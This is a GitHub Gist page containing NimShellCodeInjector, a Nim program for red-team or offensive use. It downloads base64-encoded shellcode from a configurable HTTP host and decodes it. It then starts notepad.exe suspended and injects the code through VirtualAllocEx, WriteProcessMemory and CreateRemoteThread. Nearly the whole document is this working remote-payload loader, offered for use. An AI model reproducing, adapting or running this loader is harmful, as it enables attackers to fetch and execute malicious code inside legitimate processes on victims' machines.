Created
December 21, 2021 04:07
-
-
Save mttaggart/8e5d4809c4b83f67d9653f14b4788c54 to your computer and use it in GitHub Desktop.
NimShellCodeInjector
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# With special thanks to byt3bl33d3r for Offensive Nim! | |
import winim/lean | |
import osproc | |
import base64 | |
import sequtils | |
import strutils | |
import strformat | |
import httpclient | |
let scPort = 8000 | |
let scAddr = "0.0.0.0" | |
let scFile = "note.txt" | |
let injectProcess = "notepad.exe" | |
let b64Iterations = 1 | |
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void = | |
let tProcess = startProcess(injectProcess) | |
tProcess.suspend() | |
defer: tProcess.close() | |
let pHandle = OpenProcess( | |
PROCESS_ALL_ACCESS, | |
false, | |
cast[DWORD](tProcess.processID) | |
) | |
defer: CloseHandle(pHandle) | |
let rPtr = VirtualAllocEx( | |
pHandle, | |
NULL, | |
cast[SIZE_T](shellcode.len), | |
MEM_COMMIT, | |
PAGE_EXECUTE_READ_WRITE | |
) | |
var bytesWritten: SIZE_T | |
let wSuccess = WriteProcessMemory( | |
pHandle, | |
rPtr, | |
unsafeAddr shellcode, | |
cast[SIZE_T](shellcode.len), | |
addr bytesWritten | |
) | |
let tHandle = CreateRemoteThread( | |
pHandle, | |
NULL, | |
0, | |
cast[LPTHREAD_START_ROUTINE](rPtr), | |
NULL, | |
0, | |
NULL | |
) | |
defer: CloseHandle(tHandle) | |
proc iterateDecode(sc: string, iterations: int): string = | |
result = sc | |
for i in 1..iterations: | |
result = base64.decode(result) | |
echo result | |
var client = newHttpClient() | |
var sc: string = client.get(fmt"http://{scAddr}:{scPort}/{scFile}").body | |
var sc_seq = iterateDecode(sc, b64Iterations) | |
.split(",") | |
.map(proc (h: string): string = strip(h)) | |
.map(parseHexInt) | |
# Change this based on shellcode size | |
var shellcode: array[890, byte] | |
# Shellcode size - 1 | |
for s in 0..889: | |
shellcode[s] = byte sc_seq[s] | |
when isMainModule: | |
injectCreateRemoteThread(shellcode) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment